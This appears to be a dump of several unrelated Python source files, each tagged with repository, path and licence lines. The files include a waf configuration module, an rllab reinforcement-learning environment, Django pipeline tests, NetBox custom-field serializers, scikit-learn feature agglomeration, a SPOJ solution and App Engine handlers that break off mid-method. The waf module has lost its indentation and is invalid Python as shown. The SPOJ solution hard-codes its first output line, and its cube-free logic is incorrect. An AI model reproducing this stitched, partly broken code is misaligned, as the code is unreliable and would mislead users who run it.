from waflib import ConfigSet,Utils,Options,Logs,Context,Build,Errors
BREAK='break'
CONTINUE='continue'
WAF_CONFIG_LOG='config.log'
autoconfig=False
conf_template='''# project %(app)s configured on %(now)s by
# waf %(wafver)s (abi %(abi)s, python %(pyver)x on %(systype)s)
# using %(args)s
#'''
class ConfigurationContext(Context.Context):
'''configures the project'''
cmd='configure'
error_handlers=[]
def __init__(self,**kw):
super(ConfigurationContext,self).__init__(**kw)
self.environ=dict(os.environ)
self.all_envs={}
self.top_dir=None
self.out_dir=None
self.tools=[]
self.hash=0
self.files=[]
self.tool_cache=[]
self.setenv('')
def setenv(self,name,env=None):
if name not in self.all_envs or env:
if not env:
env=ConfigSet.ConfigSet()
self.prepare_env(env)
else:
env=env.derive()
self.all_envs[name]=env
self.variant=name
def get_env(self):
return self.all_envs[self.variant]
def set_env(self,val):
self.all_envs[self.variant]=val
env=property(get_env,set_env)
def init_dirs(self):
top=self.top_dir
if not top:
top=Options.options.top
if not top:
top=getattr(Context.g_module,Context.TOP,None)
if not top:
top=self.path.abspath()
top=os.path.abspath(top)
self.srcnode=(os.path.isabs(top)and self.root or self.path).find_dir(top)
assert(self.srcnode)
out=self.out_dir
if not out:
out=Options.options.out
if not out:
out=getattr(Context.g_module,Context.OUT,None)
if not out:
out=Options.lockfile.replace('.lock-waf_%s_'%sys.platform,'').replace('.lock-waf','')
out=os.path.realpath(out)
self.bldnode=(os.path.isabs(out)and self.root or self.path).make_node(out)
self.bldnode.mkdir()
if not os.path.isdir(self.bldnode.abspath()):
   self.fatal('Could not create the build directory %s'%self.bldnode.abspath())
def execute(self):
self.init_dirs()
self.cachedir=self.bldnode.make_node(Build.CACHE_DIR)
self.cachedir.mkdir()
path=os.path.join(self.bldnode.abspath(),WAF_CONFIG_LOG)
self.logger=Logs.make_logger(path,'cfg')
app=getattr(Context.g_module,'APPNAME','')
if app:
ver=getattr(Context.g_module,'VERSION','')
if ver:
app="%s (%s)"%(app,ver)
now=time.ctime()
pyver=sys.hexversion
systype=sys.platform
args=" ".join(sys.argv)
wafver=Context.WAFVERSION
abi=Context.ABI
self.to_log(conf_template%vars())
self.msg('Setting top to',self.srcnode.abspath())
self.msg('Setting out to',self.bldnode.abspath())
if id(self.srcnode)==id(self.bldnode):
Logs.warn('Setting top == out (remember to use "update_outputs")')
elif id(self.path)!=id(self.srcnode):
if self.srcnode.is_child_of(self.path):
Logs.warn('Are you certain that you do not want to set top="." ?')
super(ConfigurationContext,self).execute()
self.store()
Context.top_dir=self.srcnode.abspath()
Context.out_dir=self.bldnode.abspath()
env=ConfigSet.ConfigSet()
env['argv']=sys.argv
env['options']=Options.options.__dict__
env.run_dir=Context.run_dir
env.top_dir=Context.top_dir
env.out_dir=Context.out_dir
env['hash']=self.hash
env['files']=self.files
env['environ']=dict(self.environ)
if not self.env.NO_LOCK_IN_RUN and not getattr(Options.options,'no_lock_in_run'):
env.store(os.path.join(Context.run_dir,Options.lockfile))
if not self.env.NO_LOCK_IN_TOP and not getattr(Options.options,'no_lock_in_top'):
env.store(os.path.join(Context.top_dir,Options.lockfile))
if not self.env.NO_LOCK_IN_OUT and not getattr(Options.options,'no_lock_in_out'):
env.store(os.path.join(Context.out_dir,Options.lockfile))
def prepare_env(self,env):
if not env.PREFIX:
if Options.options.prefix or Utils.is_win32:
env.PREFIX=os.path.abspath(os.path.expanduser(Options.options.prefix))
else:
env.PREFIX=''
if not env.BINDIR:
if Options.options.bindir:
env.BINDIR=os.path.abspath(os.path.expanduser(Options.options.bindir))
else:
env.BINDIR=Utils.subst_vars('${PREFIX}/bin',env)
if not env.LIBDIR:
if Options.options.libdir:
env.LIBDIR=os.path.abspath(os.path.expanduser(Options.options.libdir))
else:
env.LIBDIR=Utils.subst_vars('${PREFIX}/lib%s'%Utils.lib64(),env)
def store(self):
n=self.cachedir.make_node('build.config.py')
n.write('version = 0x%x\ntools = %r\n'%(Context.HEXVERSION,self.tools))
if not self.all_envs:
self.fatal('nothing to store in the configuration context!')
for key in self.all_envs:
tmpenv=self.all_envs[key]
tmpenv.store(os.path.join(self.cachedir.abspath(),key+Build.CACHE_SUFFIX))
def load(self,input,tooldir=None,funs=None):
tools=Utils.to_list(input)
if tooldir:tooldir=Utils.to_list(tooldir)
for tool in tools:
mag=(tool,id(self.env),tooldir,funs)
if mag in self.tool_cache:
self.to_log('(tool %s is already loaded, skipping)'%tool)
continue
self.tool_cache.append(mag)
module=None
try:
module=Context.load_tool(tool,tooldir,ctx=self)
except ImportError ,e:
self.fatal('Could not load the Waf tool %r from %r\n%s'%(tool,sys.path,e))
except Exception ,e:
self.to_log('imp %r (%r & %r)'%(tool,tooldir,funs))
self.to_log(Utils.ex_stack())
raise
if funs is not None:
self.eval_rules(funs)
else:
func=getattr(module,'configure',None)
if func:
if type(func)is type(Utils.readf):func(self)
else:self.eval_rules(func)
self.tools.append({'tool':tool,'tooldir':tooldir,'funs':funs})
def post_recurse(self,node):
super(ConfigurationContext,self).post_recurse(node)
self.hash=Utils.h_list((self.hash,node.read('rb')))
self.files.append(node.abspath())
def eval_rules(self,rules):
self.rules=Utils.to_list(rules)
for x in self.rules:
f=getattr(self,x)
if not f:self.fatal("No such method '%s'."%x)
try:
f()
except Exception ,e:
ret=self.err_handler(x,e)
if ret==BREAK:
break
elif ret==CONTINUE:
continue
else:
raise
def err_handler(self,fun,error):
pass
def conf(f):
def fun(*k,**kw):
mandatory=True
if'mandatory'in kw:
mandatory=kw['mandatory']
del kw['mandatory']
try:
return f(*k,**kw)
except Errors.ConfigurationError:
if mandatory:
raise
setattr(ConfigurationContext,f.__name__,fun)
setattr(Build.BuildContext,f.__name__,fun)
return f
@conf
def add_os_flags(self,var,dest=None,dup=True):
try:
flags=shlex.split(self.environ[var])
except KeyError:
return
if dup or''.join(flags)not in''.join(Utils.to_list(self.env[dest or var])):
self.env.append_value(dest or var,flags)
@conf
def cmd_to_list(self,cmd):
if isinstance(cmd,str)and cmd.find(' '):
try:
os.stat(cmd)
except OSError:
return shlex.split(cmd)
else:
return[cmd]
return cmd
@conf
def check_waf_version(self,mini='1.7.99',maxi='1.9.0',**kw):
self.start_msg('Checking for waf version in %s-%s'%(str(mini),str(maxi)),**kw)
ver=Context.HEXVERSION
if Utils.num2ver(mini)>ver:
self.fatal('waf version should be at least %r (%r found)'%(Utils.num2ver(mini),ver))
if Utils.num2ver(maxi)<ver:
self.fatal('waf version should be at most %r (%r found)'%(Utils.num2ver(maxi),ver))
self.end_msg('ok',**kw)
@conf
def find_file(self,filename,path_list=[]):
for n in Utils.to_list(filename):
for d in Utils.to_list(path_list):
p=os.path.join(d,n)
if os.path.exists(p):
return p
self.fatal('Could not find %r'%filename)
@conf
def find_program(self,filename,**kw):
exts=kw.get('exts',Utils.is_win32 and'.exe,.com,.bat,.cmd'or',.sh,.pl,.py')
environ=kw.get('environ',getattr(self,'environ',os.environ))
ret=''
filename=Utils.to_list(filename)
msg=kw.get('msg',', '.join(filename))
var=kw.get('var','')
if not var:
var=re.sub(r'[-.]','_',filename[0].upper())
path_list=kw.get('path_list','')
if path_list:
path_list=Utils.to_list(path_list)
else:
path_list=environ.get('PATH','').split(os.pathsep)
if var in environ:
filename=environ[var]
if os.path.isfile(filename):
ret=[filename]
else:
ret=self.cmd_to_list(filename)
elif self.env[var]:
ret=self.env[var]
ret=self.cmd_to_list(ret)
else:
if not ret:
ret=self.find_binary(filename,exts.split(','),path_list)
if not ret and Utils.winreg:
ret=Utils.get_registry_app_path(Utils.winreg.HKEY_CURRENT_USER,filename)
if not ret and Utils.winreg:
ret=Utils.get_registry_app_path(Utils.winreg.HKEY_LOCAL_MACHINE,filename)
ret=self.cmd_to_list(ret)
if ret:
if len(ret)==1:
retmsg=ret[0]
else:
retmsg=ret
else:
retmsg=False
self.msg("Checking for program '%s'"%msg,retmsg,**kw)
if not kw.get('quiet',None):
self.to_log('find program=%r paths=%r var=%r -> %r'%(filename,path_list,var,ret))
if not ret:
self.fatal(kw.get('errmsg','')or'Could not find the program %r'%filename)
interpreter=kw.get('interpreter',None)
if interpreter is None:
if not Utils.check_exe(ret[0],env=environ):
self.fatal('Program %r is not executable'%ret)
self.env[var]=ret
else:
self.env[var]=self.env[interpreter]+ret
return ret
@conf
def find_binary(self,filenames,exts,paths):
for f in filenames:
for ext in exts:
exe_name=f+ext
if os.path.isabs(exe_name):
if os.path.isfile(exe_name):
return exe_name
else:
for path in paths:
x=os.path.expanduser(os.path.join(path,exe_name))
if os.path.isfile(x):
return x
return None
@conf
def run_build(self,*k,**kw):
lst=[str(v)for(p,v)in kw.items()if p!='env']
h=Utils.h_list(lst)
dir=self.bldnode.abspath()+os.sep+(not Utils.is_win32 and'.'or'')+'conf_check_'+Utils.to_hex(h)
try:
os.makedirs(dir)
except OSError:
pass
try:
os.stat(dir)
except OSError:
self.fatal('cannot use the configuration test folder %r'%dir)
cachemode=getattr(Options.options,'confcache',None)
if cachemode==1:
try:
proj=ConfigSet.ConfigSet(os.path.join(dir,'cache_run_build'))
except OSError:
pass
except IOError:
pass
else:
ret=proj['cache_run_build']
if isinstance(ret,str)and ret.startswith('Test does not build'):
self.fatal(ret)
return ret
bdir=os.path.join(dir,'testbuild')
if not os.path.exists(bdir):
os.makedirs(bdir)
self.test_bld=bld=Build.BuildContext(top_dir=dir,out_dir=bdir)
bld.init_dirs()
bld.progress_bar=0
bld.targets='*'
bld.logger=self.logger
bld.all_envs.update(self.all_envs)
bld.env=kw['env']
bld.kw=kw
bld.conf=self
kw['build_fun'](bld)
ret=-1
try:
try:
bld.compile()
except Errors.WafError:
ret='Test does not build: %s'%Utils.ex_stack()
self.fatal(ret)
else:
ret=getattr(bld,'retval',0)
finally:
if cachemode==1:
proj=ConfigSet.ConfigSet()
proj['cache_run_build']=ret
proj.store(os.path.join(dir,'cache_run_build'))
else:
shutil.rmtree(dir)
return ret
@conf
def ret_msg(self,msg,args):
if isinstance(msg,str):
return msg
return msg(args)
@conf
def test(self,*k,**kw):
if not'env'in kw:
kw['env']=self.env.derive()
if kw.get('validate',None):
kw['validate'](kw)
self.start_msg(kw['msg'],**kw)
ret=None
try:
ret=self.run_build(*k,**kw)
except self.errors.ConfigurationError:
self.end_msg(kw['errmsg'],'YELLOW',**kw)
if Logs.verbose>1:
raise
else:
self.fatal('The configuration failed')
else:
kw['success']=ret
if kw.get('post_check',None):
ret=kw['post_check'](kw)
if ret:
self.end_msg(kw['errmsg'],'YELLOW',**kw)
self.fatal('The configuration failed %r'%ret)
else:
self.end_msg(self.ret_msg(kw['okmsg'],kw),**kw)
return ret
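# --- wscript sketch (added for illustration; not part of waf's Configure.py) ---
# The @conf-decorated helpers above are attached to the configuration context,
# so a project's own wscript typically calls them roughly like this (a hedged
# sketch; the program name and flag values are made-up examples):
#
# def configure(conf):
#     conf.check_waf_version(mini='1.8.0')
#     conf.find_program('gcc', var='CC')
#     conf.find_file('stdio.h', ['/usr/include'])
#     conf.env.append_value('CFLAGS', ['-O2'])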
|
asljivo1/802.11ah-ns3
|
ns-3/.waf-1.8.12-f00e5b53f6bbeab1384a38c9cc5d51f7/waflib/Configure.py
|
Python
|
gpl-2.0
| 11,505
|
from rllab.envs.base import Env
from rllab.envs.base import Step
from rllab.spaces import Box
import numpy as np
class MultiMod2DEnv(Env):
"""
This is a single time-step MDP where the action taken corresponds to the next state (in a 2D plane).
The reward has a multi-modal gaussian shape, with the mode means set in a circle around the origin.
"""
def __init__(self, mu=(1, 0), sigma=0.01, n=2, rand_init=False):
self.mu = np.array(mu)
        self.sigma = sigma  # we assume symmetric Gaussians
self.n = n
self.rand_init = rand_init
@property
def observation_space(self):
return Box(low=-np.inf, high=np.inf, shape=(2,))
@property
def action_space(self):
        return Box(low=-5.0 * np.linalg.norm(self.mu), high=5.0 * np.linalg.norm(self.mu), shape=(2,))  # symmetric action range scaled by ||mu||
def reset(self):
        if self.rand_init:
            self._state = (np.random.rand(2,) - 0.5) * 5 * np.linalg.norm(self.mu)  # mu is taken as largest
        else:
            self._state = np.zeros(shape=(2,))
observation = np.copy(self._state)
return observation
def reward_state(self, state):
x = state
mu = self.mu
A = np.array([[np.cos(2. * np.pi / self.n), -np.sin(2. * np.pi / self.n)],
[np.sin(2. * np.pi / self.n), np.cos(2. * np.pi / self.n)]]) ##rotation matrix
reward = -0.5 + 1. / (2 * np.sqrt(np.power(2. * np.pi, 2.) * self.sigma)) * (
np.exp(-0.5 / self.sigma * np.linalg.norm(x - mu) ** 2))
for i in range(1, self.n):
mu = np.dot(A, mu)
reward += 1. / (2 * np.sqrt(np.power(2. * np.pi, 2.) * self.sigma)) * (
np.exp(-0.5 / self.sigma * np.linalg.norm(x - mu) ** 2))
return reward
def step(self, action):
self._state += action
done = True
next_observation = np.copy(self._state)
reward = self.reward_state(self._state)
return Step(observation=next_observation, reward=reward, done=done)
def render(self):
print('current state:', self._state)
def log_diagnostics(self, paths):
# to count the modes I need the current policy!
pass
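# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal, hedged example of the single-step dynamics described in the class
# docstring: reset, apply one 2D action, and read the multi-modal Gaussian
# reward. It assumes a standard rllab install where Box.sample() and the Step
# namedtuple behave as usual; adjust if your rllab version differs.
if __name__ == '__main__':
    env = MultiMod2DEnv(mu=(1, 0), sigma=0.01, n=4, rand_init=False)
    obs = env.reset()                    # starts at the origin when rand_init=False
    action = env.action_space.sample()   # a random 2D displacement
    step = env.step(action)              # single-step MDP: done is always True
    print('obs:', obs, 'reward:', step.reward, 'done:', step.done)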
|
florensacc/snn4hrl
|
envs/point/multiMod2D_env.py
|
Python
|
mit
| 2,207
|
import os
from django.db.models import Max
from django.test import TestCase
from django.core import management
from django.test.utils import override_settings
from django_rq import get_worker
from sts.models import System
from vdw.samples.models import Project, Batch, Cohort, Sample, \
SampleManifest, Result
from vdw.variants.models import Variant, VariantEffect, Sift, PolyPhen2, \
ThousandG, EVS
from vdw.variants.pipeline.utils import VariantCache
from vdw.genes.models import Transcript, Gene
from ..base import QueueTestCase
TESTS_DIR = os.path.join(os.path.dirname(__file__), '../..')
SAMPLE_DIRS = [os.path.join(TESTS_DIR, 'samples')]
class VariantCacheTestCase(TestCase):
def setUp(self):
self.vcache = VariantCache()
self.vcache._cache.clear()
def test(self):
# Not in there..
self.assertFalse('1234' in self.vcache)
        # ..but the check stores a placeholder, so now it is
self.assertTrue('1234' in self.vcache)
@override_settings(VARIFY_SAMPLE_DIRS=SAMPLE_DIRS)
class SampleLoadTestCase(QueueTestCase):
def test_pipeline(self):
expected_counts = {
'batches': 2,
'cohorts': 2,
'genes': 65,
'projects': 1,
'results_per_sample': [
{
'batch': 'batch1',
'sample': 'NA12891',
'count': 1963,
},
{
'batch': 'batch1',
'sample': 'NA12892',
'count': 1963,
},
{
'batch': 'batch1',
'sample': 'NA12878',
'count': 1963,
},
{
'batch': 'batch2',
'sample': 'NA12891',
'count': 2094,
},
{
'batch': 'batch2',
'sample': 'NA12892',
'count': 2094,
},
{
'batch': 'batch2',
'sample': 'NA12878',
'count': 2094,
},
],
'samples': 6,
'transcripts': 108,
'variant_effects': 8788,
'variants': 4057,
'samples_per_batch': [(1, 3), (2, 3)],
}
expected_counts['results'] = \
sum([x['count'] for x in expected_counts['results_per_sample']])
# Immediately validates and creates a sample
management.call_command('samples', 'queue')
# Synchronously work on queue
worker1 = get_worker('variants')
worker2 = get_worker('default')
# Ensure sample-related entries are created..
self.assertEqual(Project.objects.count(), expected_counts['projects'])
self.assertEqual(Batch.objects.count(), expected_counts['batches'])
self.assertEqual(Sample.objects.count(), expected_counts['samples'])
# World and project cohort..
self.assertEqual(Cohort.objects.count(), expected_counts['cohorts'])
# Nothing published yet..
self.assertEqual(Sample.objects.filter(published=False).count(),
expected_counts['samples'])
self.assertEqual(
Cohort.objects.filter(count=0, published=False).count(),
expected_counts['cohorts'])
self.assertEqual(
Batch.objects.filter(count=0, published=False).count(),
expected_counts['batches'])
# Manifests are stored
self.assertEqual(SampleManifest.objects.count(),
expected_counts['samples'])
for manifest in SampleManifest.objects.all():
self.assertNotEqual(manifest.content, '')
self.assertFalse(manifest.content_has_changed())
# Work on variants...
worker1.work(burst=True)
self.assertEqual(Variant.objects.count(), expected_counts['variants'])
# Work on effects...
worker2.work(burst=True)
self.assertEqual(Gene.objects.count(), expected_counts['genes'])
self.assertEqual(Transcript.objects.count(),
expected_counts['transcripts'])
self.assertEqual(VariantEffect.objects.count(),
expected_counts['variant_effects'])
self.assertEqual(Sift.objects.count(), 0)
self.assertEqual(PolyPhen2.objects.count(), 0)
self.assertEqual(ThousandG.objects.count(), 0)
self.assertEqual(EVS.objects.count(), 0)
# Results loaded..
self.assertEqual(Result.objects.count(), expected_counts['results'])
# Batches are now published..
self.assertEqual(Batch.objects.filter(published=True).count(),
expected_counts['batches'])
# Ensure the counts are accurate for each sample..
for ec in expected_counts['results_per_sample']:
sample = Sample.objects.get(name=ec['sample'],
batch__name=ec['batch'])
self.assertTrue(sample.published)
self.assertEqual(sample.count, ec['count'])
        # Batches were created along with the samples and should now be published with accurate counts
for pk, count in expected_counts['samples_per_batch']:
batch = Batch.objects.get(pk=pk)
self.assertTrue(batch.published)
self.assertEqual(batch.count, count)
# Ensure the state changes were logged..
system = System.get(Sample.objects.all()[0])
self.assertEqual(len(system), 3)
@override_settings(VDW_GENOME_VERSION='hg18')
def test_wrong_genome_version(self):
# Immediately validates and creates a sample.
management.call_command('samples', 'queue')
# Synchronously work on queue.
worker1 = get_worker('variants')
worker2 = get_worker('default')
# Work on variants.
worker1.work(burst=True)
# Work on effects.
worker2.work(burst=True)
# Since the genome version was required but does not match any of the
# versions specified in the MANIFESTs, we should have no data.
self.assertEqual(Variant.objects.count(), 0)
self.assertEqual(Result.objects.count(), 0)
self.assertEqual(Sample.objects.count(), 0)
self.assertEqual(Cohort.objects.count(), 0)
self.assertEqual(Batch.objects.count(), 0)
self.assertEqual(Project.objects.count(), 0)
class SnpeffReloadTest(QueueTestCase):
def test(self):
"Load a single VCF, reload the snpEff data using the same VCF."
management.call_command('samples', 'queue',
os.path.join(SAMPLE_DIRS[0], 'batch1/locus_1'),
startworkers=True)
expected_variant_effects_count = 5426
self.assertEqual(VariantEffect.objects.count(),
expected_variant_effects_count)
self.assertEqual(
VariantEffect.objects.aggregate(max_id=Max('id'))['max_id'],
expected_variant_effects_count)
management.call_command('variants', 'reload-snpeff',
os.path.join(SAMPLE_DIRS[0],
'batch1/locus_1/locus_1.vcf'))
# Ensure data was actually reloaded, check the auto-incremented key
self.assertEqual(VariantEffect.objects.count(),
expected_variant_effects_count)
# Since we reloaded, we should now have double the number of expected
# results, thus the 2 * operation in the assertion below.
self.assertEqual(
VariantEffect.objects.aggregate(max_id=Max('id'))['max_id'],
2 * expected_variant_effects_count)
|
chop-dbhi/varify-data-warehouse
|
tests/cases/sample_load_process/tests.py
|
Python
|
bsd-2-clause
| 7,802
|
from django.contrib.contenttypes.models import ContentType
from django.db import transaction
from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from extras.models import CF_TYPE_SELECT, CustomField, CustomFieldChoice, CustomFieldValue
#
# Custom fields
#
class CustomFieldsSerializer(serializers.BaseSerializer):
def to_representation(self, obj):
return obj
def to_internal_value(self, data):
content_type = ContentType.objects.get_for_model(self.parent.Meta.model)
custom_fields = {field.name: field for field in CustomField.objects.filter(obj_type=content_type)}
for field_name, value in data.items():
# Validate custom field name
if field_name not in custom_fields:
raise ValidationError(u"Invalid custom field for {} objects: {}".format(content_type, field_name))
# Validate selected choice
cf = custom_fields[field_name]
if cf.type == CF_TYPE_SELECT:
valid_choices = [c.pk for c in cf.choices.all()]
if value not in valid_choices:
raise ValidationError(u"Invalid choice ({}) for field {}".format(value, field_name))
# Check for missing required fields
missing_fields = []
for field_name, field in custom_fields.items():
if field.required and field_name not in data:
missing_fields.append(field_name)
if missing_fields:
raise ValidationError(u"Missing required fields: {}".format(u", ".join(missing_fields)))
return data
class CustomFieldModelSerializer(serializers.ModelSerializer):
"""
Extends ModelSerializer to render any CustomFields and their values associated with an object.
"""
custom_fields = CustomFieldsSerializer(required=False)
def __init__(self, *args, **kwargs):
def _populate_custom_fields(instance, fields):
custom_fields = {f.name: None for f in fields}
for cfv in instance.custom_field_values.all():
if cfv.field.type == CF_TYPE_SELECT:
custom_fields[cfv.field.name] = CustomFieldChoiceSerializer(cfv.value).data
else:
custom_fields[cfv.field.name] = cfv.value
instance.custom_fields = custom_fields
super(CustomFieldModelSerializer, self).__init__(*args, **kwargs)
if self.instance is not None:
# Retrieve the set of CustomFields which apply to this type of object
content_type = ContentType.objects.get_for_model(self.Meta.model)
fields = CustomField.objects.filter(obj_type=content_type)
# Populate CustomFieldValues for each instance from database
try:
for obj in self.instance:
_populate_custom_fields(obj, fields)
except TypeError:
_populate_custom_fields(self.instance, fields)
def _save_custom_fields(self, instance, custom_fields):
content_type = ContentType.objects.get_for_model(self.Meta.model)
for field_name, value in custom_fields.items():
custom_field = CustomField.objects.get(name=field_name)
CustomFieldValue.objects.update_or_create(
field=custom_field,
obj_type=content_type,
obj_id=instance.pk,
defaults={'serialized_value': value},
)
def create(self, validated_data):
custom_fields = validated_data.pop('custom_fields', None)
with transaction.atomic():
instance = super(CustomFieldModelSerializer, self).create(validated_data)
# Save custom fields
if custom_fields is not None:
self._save_custom_fields(instance, custom_fields)
instance.custom_fields = custom_fields
return instance
def update(self, instance, validated_data):
custom_fields = validated_data.pop('custom_fields', None)
with transaction.atomic():
instance = super(CustomFieldModelSerializer, self).update(instance, validated_data)
# Save custom fields
if custom_fields is not None:
self._save_custom_fields(instance, custom_fields)
instance.custom_fields = custom_fields
return instance
class CustomFieldChoiceSerializer(serializers.ModelSerializer):
"""
Imitate utilities.api.ChoiceFieldSerializer
"""
value = serializers.IntegerField(source='pk')
label = serializers.CharField(source='value')
class Meta:
model = CustomFieldChoice
fields = ['value', 'label']
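# --- Payload sketch (added for illustration; field names below are hypothetical) ---
# CustomFieldsSerializer.to_internal_value() expects the "custom_fields" key of a
# write request to be a flat mapping of custom-field name to value, e.g.:
#
#     {
#         "name": "core-switch-01",
#         "custom_fields": {
#             "deployment_zone": 2,          # pk of a CustomFieldChoice for a select field
#             "purchase_date": "2017-01-01"  # plain value for a non-select field
#         }
#     }
#
# Unknown field names, invalid select choices and missing required fields all
# raise ValidationError, as implemented above.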
|
Alphalink/netbox
|
netbox/extras/api/customfields.py
|
Python
|
apache-2.0
| 4,728
|
"""
Feature agglomeration. Base classes and functions for performing feature
agglomeration.
"""
# Author: V. Michel, A. Gramfort
# License: BSD 3 clause
import numpy as np
from ..base import TransformerMixin
from ..utils import array2d
###############################################################################
# Mixin class for feature agglomeration.
class AgglomerationTransform(TransformerMixin):
"""
A class for feature agglomeration via the transform interface
"""
def transform(self, X, pooling_func=np.mean):
"""
Transform a new matrix using the built clustering
        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]
            An M by N array of M observations in N dimensions, or a length-M
            array of M one-dimensional observations.
        pooling_func : callable, default=np.mean
            A function that takes an array of shape [M, N] and returns an
            array of M pooled values, one per group of features.
"""
X = array2d(X)
nX = []
if len(self.labels_) != X.shape[1]:
raise ValueError("X has a different number of features than "
"during fitting.")
for l in np.unique(self.labels_):
nX.append(pooling_func(X[:, self.labels_ == l], axis=1))
return np.array(nX).T
def inverse_transform(self, Xred):
"""
        Invert the transformation.
        Return an array with the values of Xred assigned to each group of
        features.
        Parameters
        ----------
        Xred : array of size k (or of shape [n_samples, k])
            The values to be assigned to each cluster of features.
        Returns
        -------
        X : array of size nb_features (or of shape [n_samples, nb_features])
            An array with the values of Xred assigned to each cluster of
            features.
"""
if np.size((Xred.shape)) == 1:
X = np.zeros([self.labels_.shape[0]])
else:
X = np.zeros([Xred.shape[0], self.labels_.shape[0]])
unil = np.unique(self.labels_)
for i in range(len(unil)):
if np.size((Xred.shape)) == 1:
X[self.labels_ == unil[i]] = Xred[i]
else:
X[:, self.labels_ == unil[i]] = array2d(Xred[:, i]).T
return X
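# --- Illustration (added; not part of the original module) ---
# A hedged, self-contained numpy sketch of the pooling performed by transform():
# columns of X that share a label in labels_ are reduced to one column with
# pooling_func (np.mean here). The toy array and labels below are made up.
if __name__ == '__main__':
    X_demo = np.array([[1., 2., 3., 4.],
                       [5., 6., 7., 8.]])
    labels_demo = np.array([0, 0, 1, 1])  # two clusters of two features each
    pooled = np.array([np.mean(X_demo[:, labels_demo == l], axis=1)
                       for l in np.unique(labels_demo)]).T
    print(pooled)  # [[1.5 3.5]
                   #  [5.5 7.5]]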
|
florian-f/sklearn
|
sklearn/cluster/_feature_agglomeration.py
|
Python
|
bsd-3-clause
| 2,350
|
T = int(raw_input())
for i in range (0, T):
number = int(raw_input())
if number == 1:
print "Case 1: 1"
continue
remain = number % 8
quotient = int(number / 8)
displacement = quotient*8 - quotient
if remain == 0 :
print "Case " + str((i+1)) + ": Not Cube Free"
else:
print "Case " + str((i+1)) + ": " + str(displacement + remain)
|
prabodhprakash/problemsolving
|
spoj/CUBEFR.py
|
Python
|
mit
| 348
|
# In routing.py
from channels.routing import route
from .consumers import ws_connect, ws_receive, ws_disconnect
channel_routing = {
'websocket.connect': ws_connect,
'websocket.receive': ws_receive,
'websocket.disconnect': ws_disconnect,
}
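# --- Consumer sketch (added for illustration; hypothetical, not this project's code) ---
# channel_routing above maps Channels 1.x websocket channels to plain functions
# that receive a `message`. The example below is a guess at that general shape,
# shown under a made-up name so it does not shadow the imported consumers.
def example_ws_echo(message):
    # Echo a received text frame back over the reply channel (Channels 1.x style).
    message.reply_channel.send({'text': message.content.get('text', '')})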
|
Petrole/MaturePyRobots
|
WebPyRobot/backend/routing.py
|
Python
|
gpl-3.0
| 253
|
# Copyright 2014 Roberto Brian Sarrionandia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
import jinja2
import os
from google.appengine.ext import ndb
import tusers
from forms import JudgeForm, TeamForm
from models import RegisteredOpenTeam, InstitutionTeam, RegisteredIndependentJudge, InstitutionJudge
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class JudgeHandler(webapp2.RequestHandler):
def get(self):
user = tusers.get_current_user()
form = JudgeForm()
j = self.request.get('j')
j_key = ndb.Key(urlsafe=j)
judge = j_key.get()
reg = None
institution = None
if judge.authorised(user):
form.name.data = judge.name
form.cv.data = judge.cv
if isinstance(judge, InstitutionJudge):
institution = j_key.parent().get()
t = j_key.parent().parent().parent().get()
form.phone.data = institution.phone
reg = j_key.parent().parent().get()
elif isinstance(judge, RegisteredIndependentJudge):
reg = j_key.parent().get()
form.phone.data = judge.phone
t = reg.key.parent().get()
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/judge?j=' + j),
'r' : reg,
'form' : form,
'j' : j_key.urlsafe(),
'institution' : institution
}
template = JINJA_ENVIRONMENT.get_template('view/modjudge.html')
self.response.write(template.render(template_values))
return
else:
self.redirect(self.request.referer)
def post(self):
user = tusers.get_current_user()
form = JudgeForm(self.request.POST)
j = self.request.get('j')
j_key = ndb.Key(urlsafe=j)
judge = j_key.get()
reg = None
institution = None
if judge.authorised(user):
if isinstance(judge, InstitutionJudge):
institution = j_key.parent().get()
reg = institution.key.parent().get()
form.phone.data = institution.phone
elif isinstance(judge, RegisteredIndependentJudge):
reg = j_key.parent().get()
t = reg.key.parent().get()
if (form.validate()):
judge.name = form.name.data
judge.phone = form.phone.data
judge.cv = form.cv.data
judge.put()
self.redirect('/reg_control?t=' + str(t.key.id()))
else:
template_values = {
'user' : user,
't' : t,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/judge?j=' + j),
'r' : reg,
'form' : form,
'institution' : institution,
}
template = JINJA_ENVIRONMENT.get_template('view/modjudge.html')
self.response.write(template.render(template_values))
else:
self.redirect(self.request.referer)
#Handles the modification of teams
class TeamHandler(webapp2.RequestHandler):
def get(self):
user = tusers.get_current_user()
form = TeamForm()
t_string = self.request.get('t')
t_key = ndb.Key(urlsafe=t_string)
team = t_key.get()
t = None
reg = None
if team.authorised(user):
form.teamName.data = team.teamName
form.sp1Name.data = team.sp1Name
form.sp2Name.data = team.sp2Name
form.sp1ESL.data = team.sp1ESL
form.sp1Novice.data = team.sp1Novice
form.sp2ESL.data = team.sp2ESL
            form.sp2Novice.data = team.sp2Novice
institution = None
if isinstance(team, RegisteredOpenTeam ):
reg = t_key.parent().get()
elif isinstance(team, InstitutionTeam):
institution = team.key.parent().get()
form.leadName.data = institution.leadName
form.phone.data = institution.phone
reg = t_key.parent().parent().get()
t = reg.key.parent().get()
template_values = {
'user' : user,
'logout' : tusers.create_logout_url('/'),
'login' : tusers.create_login_url('/mod/team?t=' + t_string),
'r' : reg,
't' : t,
'form' : form,
'institution' : institution,
'team' : t_key.urlsafe()
}
template = JINJA_ENVIRONMENT.get_template('view/modteam.html')
self.response.write(template.render(template_values))
return
else:
self.redirect(self.request.referer)
def post(self):
user = tusers.get_current_user()
form = TeamForm(self.request.POST)
t_string = self.request.get('t')
t_key = ndb.Key(urlsafe=t_string)
team = t_key.get()
institution = None
t = None
# If it is an institutional team, don't let them update the contact info
# with this method, as that data belongs to the Institution
if (isinstance(team, InstitutionTeam)):
institution = team.key.parent().get()
form.leadName.data = institution.leadName
